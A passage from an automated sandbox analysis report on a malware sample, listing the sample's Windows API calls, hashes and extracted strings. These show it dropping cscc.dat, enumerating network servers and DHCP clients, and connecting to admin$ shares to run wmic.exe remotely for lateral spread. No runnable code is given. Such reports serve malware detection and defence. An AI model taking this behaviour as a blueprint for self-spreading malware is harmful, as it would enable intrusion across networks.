                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID:
                                              • API String ID: 3859560861-0
                                              • Opcode ID: 0e2c91ee107b4329c3dbb506f7c247df65b6b61675f29455aab056b7bbc9f67b
                                              • Instruction ID: 99f43dae54d0f16cbcccef1cf29ae206f07fc6033663cdd74de644ee4c372a94
                                              • Opcode Fuzzy Hash: 0e2c91ee107b4329c3dbb506f7c247df65b6b61675f29455aab056b7bbc9f67b
                                              • Instruction Fuzzy Hash: 1C1182766003156BE714AA69AC40F2B779CEB89760F050565FF0CD3240D724FE19CAF1
                                              Function 04BF7E8E Relevance: 4.5, APIs: 3, Instructions: 43COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 04BF7E69: PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,04BF7EA6,?), ref: 04BF7E7C
                                              • PathFileExistsW.KERNELBASE(?,?), ref: 04BF7EB1
                                              • GetCurrentProcess.KERNEL32(?,?), ref: 04BF7EC3
                                                • Part of subcall function 04BF6F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04BF7170,00000000,?,04BF7AF8), ref: 04BF6F8E
                                                • Part of subcall function 04BF6F7C: GetProcAddress.KERNEL32(00000000), ref: 04BF6F95
                                                • Part of subcall function 04BF8313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 04BF832A
                                                • Part of subcall function 04BF8313: LoadResource.KERNEL32(00000000), ref: 04BF8341
                                                • Part of subcall function 04BF8313: LockResource.KERNEL32(00000000), ref: 04BF8350
                                                • Part of subcall function 04BF8313: SizeofResource.KERNEL32(00000000), ref: 04BF8368
                                                • Part of subcall function 04BF8313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04BF8384
                                                • Part of subcall function 04BF8313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 04BF838D
                                                • Part of subcall function 04BF8313: memcpy.MSVCRT ref: 04BF839C
                                                • Part of subcall function 04BF8313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 04BF83B9
                                                • Part of subcall function 04BF8313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 04BF83BC
                                                • Part of subcall function 04BF8313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 04BF840A
                                                • Part of subcall function 04BF8313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 04BF840D
                                                • Part of subcall function 04BF87E7: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,04BF11BB,?,?), ref: 04BF87FC
                                                • Part of subcall function 04BF87E7: WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,04BF11BB,?,?), ref: 04BF8813
                                                • Part of subcall function 04BF87E7: FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?,04BF11BB,?,?), ref: 04BF8824
                                              • ExitProcess.KERNEL32 ref: 04BF7EFD
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Resource$File$AllocateFindPath$AddressChangeCloseCombineCreateCurrentExistsExitFreeHandleLoadLockModuleNotificationProcSizeofWritememcpy
                                              • String ID:
                                              • API String ID: 706652641-0
                                              • Opcode ID: 15dff9950b0a56682f79fa90ee6918e43e54813eed70dbc4fa47d3c1adcef61c
                                              • Instruction ID: 82ffd8e457d6322258e495db4ab1723070711e09714b4aca4be8d78c23332627
                                              • Opcode Fuzzy Hash: 15dff9950b0a56682f79fa90ee6918e43e54813eed70dbc4fa47d3c1adcef61c
                                              • Instruction Fuzzy Hash: 8BF0447690051967EF10EBF4DC44EDEB3BDEB08244F4404D2AA09D3540EB35EE1987A0
                                              Function 04BF6FAF Relevance: 4.5, APIs: 3, Instructions: 36fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,04BF7201,?,?,?,04BF7AF8), ref: 04BF6FC5
                                              • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,04BF7201,?,?,?,04BF7AF8), ref: 04BF6FDF
                                              • CloseHandle.KERNEL32(00000000,?,?,04BF7201,?,?,?,04BF7AF8), ref: 04BF6FF0
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateHandleWrite
                                              • String ID:
                                              • API String ID: 1065093856-0
                                              • Opcode ID: c86080a6e28b676c5669c4139ef5cdf9c6259b61c551f724f60978492345d8b1
                                              • Instruction ID: 89816e02a9fe55b5cdea4116410e3baa4a9cce641478add1b14a1e143ec608e7
                                              • Opcode Fuzzy Hash: c86080a6e28b676c5669c4139ef5cdf9c6259b61c551f724f60978492345d8b1
                                              • Instruction Fuzzy Hash: 57F0F8312011287AEB305E66EC4CEABBF6CEB56BF1F108112FE0E86190C630D946D6F0
                                              Function 04BF87E7 Relevance: 4.5, APIs: 3, Instructions: 35fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,04BF11BB,?,?), ref: 04BF87FC
                                              • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,04BF11BB,?,?), ref: 04BF8813
                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?,04BF11BB,?,?), ref: 04BF8824
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: File$ChangeCloseCreateFindNotificationWrite
                                              • String ID:
                                              • API String ID: 3805958096-0
                                              • Opcode ID: 6613e3ce70fc6d4bb08914cc8c3ee7586db1d2cdf7e0a316ed4127445823b070
                                              • Instruction ID: 4ad453489620e1c3ea769e94d8d543dce7f8a32978b6702b672f114b41ff383b
                                              • Opcode Fuzzy Hash: 6613e3ce70fc6d4bb08914cc8c3ee7586db1d2cdf7e0a316ed4127445823b070
                                              • Instruction Fuzzy Hash: 3DF012311010247ADB302E96EC4CEEB7E5CEF467F1B004126FA0D86450D734D945D6F1
                                              Function 04BF6D35 Relevance: 3.8, APIs: 3, Instructions: 48sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,771AF380,?,04BF6D1C,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D46
                                              • LeaveCriticalSection.KERNEL32(?,?,04BF6D1C,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D7F
                                              • Sleep.KERNELBASE(00002710,?,04BF6D1C,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D97
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeaveSleep
                                              • String ID:
                                              • API String ID: 1566154052-0
                                              • Opcode ID: 6d3f21522d4c3a0fb607ccbd8e387840e28636c37e93fa7046856a2769ccbcc6
                                              • Instruction ID: e4da7b8cffe5fe735a3b1276722ecb3ba0103f145b859165e2121e5fc7d53c17
                                              • Opcode Fuzzy Hash: 6d3f21522d4c3a0fb607ccbd8e387840e28636c37e93fa7046856a2769ccbcc6
                                              • Instruction Fuzzy Hash: 7E01A23D300A028B9B299F19C890E3777B6EFC574430585ACEE0E8B215EB30F85BA651
                                              Function 04BFA333 Relevance: 3.8, APIs: 3, Instructions: 48memorysleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(?), ref: 04BFA344
                                              • GetProcessHeap.KERNEL32(00000000,?,?), ref: 04BFA399
                                              • HeapFree.KERNEL32(00000000), ref: 04BFA3A0
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$FreeProcessSleep
                                              • String ID:
                                              • API String ID: 1803097132-0
                                              • Opcode ID: bf7d9f11e5b7d7fce6c484a5f54366538dc2bd4db63db2dabbdd377a7e9a3b35
                                              • Instruction ID: 4074b23239d3a9eeb31b84329104a8de72082013af1ef4c3c3ff33b4c77a3966
                                              • Opcode Fuzzy Hash: bf7d9f11e5b7d7fce6c484a5f54366538dc2bd4db63db2dabbdd377a7e9a3b35
                                              • Instruction Fuzzy Hash: 50014F725143066BE710EEB5DC84EABB7ACEF88314F04096ABA09C3151EB24F919C7A1
                                              Function 04BF751B Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                              Download Yara Rule
                                              APIs
                                              • NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,?,?,?,?), ref: 04BF754C
                                              • NetApiBufferFree.NETAPI32(?), ref: 04BF75C9
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: BufferEnumFreeServer
                                              • String ID:
                                              • API String ID: 2429717511-0
                                              • Opcode ID: a6210320580c4355f184f1eebe196bbdd128160871c437106696df499a3c3ac2
                                              • Instruction ID: 3fcae9aed23c0cfb91c9b8f4c8a7aeae3cc1bbebf471e63fd925f9c40f7c7931
                                              • Opcode Fuzzy Hash: a6210320580c4355f184f1eebe196bbdd128160871c437106696df499a3c3ac2
                                              • Instruction Fuzzy Hash: 0D2149B6900219EBDF21CF98CC44AEEBB79FB08710F1045D6FA19A6150E770B759DB90
                                              Function 04BF7DD0 Relevance: 3.1, APIs: 2, Instructions: 72COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 04BF6477: GetTickCount.KERNEL32 ref: 04BF6477
                                              • NetServerGetInfo.NETAPI32(00000000,00000065,?,?,?,00000000,?,?,04BF7AA3,?,?,000000FF,?,?), ref: 04BF7DF6
                                              • NetApiBufferFree.NETAPI32(?,?,?,00000000,?,?,04BF7AA3,?,?,000000FF,?,?), ref: 04BF7E0F
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: BufferCountFreeInfoServerTick
                                              • String ID:
                                              • API String ID: 2934114180-0
                                              • Opcode ID: 42a701bf71d35475a302de29a7798407e2ad0bff565b493c84a95ef11998681a
                                              • Instruction ID: 94ed1f8727fb83862c46f525a697009679d591cf37166e683d811376b56d1ef6
                                              • Opcode Fuzzy Hash: 42a701bf71d35475a302de29a7798407e2ad0bff565b493c84a95ef11998681a
                                              • Instruction Fuzzy Hash: 71116A727002099BE724CE69DC85F6EB79EEB80750F1855EAE609CB144DB70ED149750
                                              Function 04BF6DA4 Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,04BF6E98,?,00000000,?,?,04BF6A84,?,?), ref: 04BF6DB5
                                              • LeaveCriticalSection.KERNEL32(?,?,?,04BF6E98,?,00000000,?,?,04BF6A84,?,?), ref: 04BF6E0C
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3168844106-0
                                              • Opcode ID: a6d99754081df198ab854fdc8e80cbe39bd0c88cdc8957e9b8fc04d00e65f1f7
                                              • Instruction ID: c84318a58f00e1e5376a6d5d8871eed9ba93a81a036136f77d6b9b4ab13abb24
                                              • Opcode Fuzzy Hash: a6d99754081df198ab854fdc8e80cbe39bd0c88cdc8957e9b8fc04d00e65f1f7
                                              • Instruction Fuzzy Hash: 72112935700A01AFC725CF6AC884A5AB7F6FF993047044969E94BC7711DB31F91ADA50
                                              Function 04BF6AA8 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                              Download Yara Rule
                                              APIs
                                              • StrCmpIW.KERNELBASE(00000000,?), ref: 04BF6ABD
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c29a06f94d982558a8ee75c5e80d3e79d43dbb1c92be7e011a318f4b53419b9c
                                              • Instruction ID: 2ce40868f0b69fba17ce6c034fe73753c4fde46d0573ebf9941b311594b5f086
                                              • Opcode Fuzzy Hash: c29a06f94d982558a8ee75c5e80d3e79d43dbb1c92be7e011a318f4b53419b9c
                                              • Instruction Fuzzy Hash: 22D05E31154109EEDF115F64DC08BB837A8E710306F04C021BA0E850B0F275D1AEDA90
                                              Function 04BFC493 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: malloc
                                              • String ID:
                                              • API String ID: 2803490479-0
                                              • Opcode ID: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
                                              • Instruction ID: 03bb7ee9a102bae6bfeaf316c5b7d2b42696aae6cc1a4b4944c75cb29e37d423
                                              • Opcode Fuzzy Hash: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
                                              • Instruction Fuzzy Hash: 60B0123311830E5B9F08EED8ED82C5AB3DCEAA8524B404447FA1C8F140E931F6144658

                                              Non-executed Functions

                                              Function 04BF9B63 Relevance: 73.8, APIs: 35, Strings: 7, Instructions: 296shareprocessthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • wsprintfW.USER32 ref: 04BF9BA5
                                                • Part of subcall function 04BF88D3: PathFindFileNameW.SHLWAPI(04C07BC8,75A373E0,?,04BF95B2), ref: 04BF88E3
                                              • wsprintfW.USER32 ref: 04BF9BF2
                                              • wsprintfW.USER32 ref: 04BF9C16
                                              • PathFindExtensionW.SHLWAPI(?), ref: 04BF9C22
                                              • wsprintfW.USER32 ref: 04BF9C41
                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 04BF9C59
                                              • PathFileExistsW.SHLWAPI(?), ref: 04BF9C69
                                              • GetLastError.KERNEL32 ref: 04BF9C73
                                              • GetLastError.KERNEL32(?), ref: 04BF9C9A
                                              • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04BF9CDD
                                              • GetCurrentThread.KERNEL32 ref: 04BF9D1B
                                              • OpenThreadToken.ADVAPI32(00000000), ref: 04BF9D22
                                              • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 04BF9D3C
                                              • memset.MSVCRT ref: 04BF9D62
                                              • GetSystemDirectoryW.KERNEL32 ref: 04BF9D8A
                                              • PathAppendW.SHLWAPI(?,wbem\wmic.exe), ref: 04BF9DAA
                                              • PathFileExistsW.SHLWAPI(?), ref: 04BF9DB7
                                              • wsprintfW.USER32 ref: 04BF9DD8
                                              • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,?), ref: 04BF9E24
                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,?,00000104), ref: 04BF9E2C
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000104), ref: 04BF9E3B
                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 04BF9E4B
                                              • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04BF9E59
                                              • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04BF9E63
                                              • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04BF9E6D
                                              • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04BF9E77
                                              • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04BF9E81
                                              • PathFileExistsW.SHLWAPI(?,?,?,00000104), ref: 04BF9E99
                                              • GetLastError.KERNEL32(?,?,?,?,?,00000104), ref: 04BF9EA6
                                              • DeleteFileW.KERNEL32(?), ref: 04BF9EC5
                                              • CloseHandle.KERNEL32(?), ref: 04BF9ED7
                                              • CloseHandle.KERNEL32(?), ref: 04BF9EE4
                                                • Part of subcall function 04BF68B5: GetProcessHeap.KERNEL32(00000008,?,75A373E0,00000000), ref: 04BF68EB
                                                • Part of subcall function 04BF68B5: HeapAlloc.KERNEL32(00000000), ref: 04BF68F4
                                                • Part of subcall function 04BF68B5: memcpy.MSVCRT ref: 04BF6921
                                                • Part of subcall function 04BF68B5: GetProcessHeap.KERNEL32(00000008,?,771AE010), ref: 04BF6946
                                                • Part of subcall function 04BF68B5: HeapAlloc.KERNEL32(00000000), ref: 04BF6949
                                                • Part of subcall function 04BF68B5: memcpy.MSVCRT ref: 04BF6978
                                                • Part of subcall function 04BF68B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 04BF6995
                                                • Part of subcall function 04BF68B5: HeapFree.KERNEL32(00000000), ref: 04BF6998
                                                • Part of subcall function 04BF68B5: GetProcessHeap.KERNEL32(00000000,?), ref: 04BF699F
                                                • Part of subcall function 04BF68B5: HeapFree.KERNEL32(00000000), ref: 04BF69A2
                                              • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04BF9EF9
                                              • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,04BF9FCE,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000003,?), ref: 04BF9F17
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$CloseHandleProcess$Path$Filewsprintf$ErrorLast$Connection2Exists$AllocCancelCreateFindFreeThreadTokenmemcpy$AppendCodeCurrentDeleteDirectoryDuplicateExitExtensionNameObjectOpenSingleSystemUserWaitmemset
                                              • String ID: %ws $D$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat$wbem\wmic.exe
                                              • API String ID: 659518118-2685502051
                                              • Opcode ID: d52e9641fdc26530df3fdf3f9b30685115a285cb79727e07229cd8b0c0c6bfe4
                                              • Instruction ID: 6480631f9bbe9e123b54ee33178fb763fe00c68460be6734a3968f9ac1ef80d0
                                              • Opcode Fuzzy Hash: d52e9641fdc26530df3fdf3f9b30685115a285cb79727e07229cd8b0c0c6bfe4
                                              • Instruction Fuzzy Hash: 1EB109B1900219EFDF11DFA4DC88AEEBBBDFF44704F1445A6E609A2110D734AA98DF61
                                              Function 04BF57E5 Relevance: 18.2, APIs: 12, Instructions: 160memorytimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LocalAlloc.KERNEL32(00000040,000000F0,00000000,00000000), ref: 04BF5805
                                              • GetSystemDefaultLCID.KERNEL32 ref: 04BF581D
                                              • GetTimeZoneInformation.KERNEL32(?), ref: 04BF582D
                                              • memcpy.MSVCRT ref: 04BF584B
                                              • NetWkstaGetInfo.NETAPI32(04C00494,00000064,?), ref: 04BF5861
                                              • memcpy.MSVCRT ref: 04BF58C7
                                              • memcpy.MSVCRT ref: 04BF58EA
                                              • NetApiBufferFree.NETAPI32(?,?,?,?), ref: 04BF58F3
                                              • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?), ref: 04BF5924
                                              • memcpy.MSVCRT ref: 04BF5943
                                              • LocalFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 04BF598C
                                              • LocalFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 04BF59A2
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Localmemcpy$Free$Alloc$BufferDefaultInfoInformationSystemTimeWkstaZone
                                              • String ID:
                                              • API String ID: 2529142246-0
                                              • Opcode ID: 00f1d4c83a5b530fa69365f90e0df2830d089c0184b351a29726f245a0f61d82
                                              • Instruction ID: 303390a4ece42a3145533994c2beeec485e404324bdc2491a8383b8cd97b25d1
                                              • Opcode Fuzzy Hash: 00f1d4c83a5b530fa69365f90e0df2830d089c0184b351a29726f245a0f61d82
                                              • Instruction Fuzzy Hash: B3518571900206EFDB20DF64CC84E9ABBA9FF48314F058995EA5D97241E774EA54CB50
                                              Function 04BF8D39 Relevance: 16.6, APIs: 11, Instructions: 130memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetComputerNameExW.KERNEL32(00000004,?,?,00000000,70204950,00000000), ref: 04BF8D80
                                              • DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 04BF8DA2
                                              • DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 04BF8DCE
                                              • DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 04BF8E07
                                              • htonl.WS2_32(00000000), ref: 04BF8E36
                                              • htonl.WS2_32(00000000), ref: 04BF8E44
                                              • inet_ntoa.WS2_32(00000000), ref: 04BF8E47
                                                • Part of subcall function 04BF641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,75C95350,?), ref: 04BF6439
                                                • Part of subcall function 04BF641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF6446
                                                • Part of subcall function 04BF641A: HeapAlloc.KERNEL32(00000000), ref: 04BF644D
                                                • Part of subcall function 04BF641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04BF6465
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 04BF8E65
                                              • HeapFree.KERNEL32(00000000), ref: 04BF8E6C
                                              • DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 04BF8E81
                                              • DhcpRpcFreeMemory.DHCPSAPI(?), ref: 04BF8E9A
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
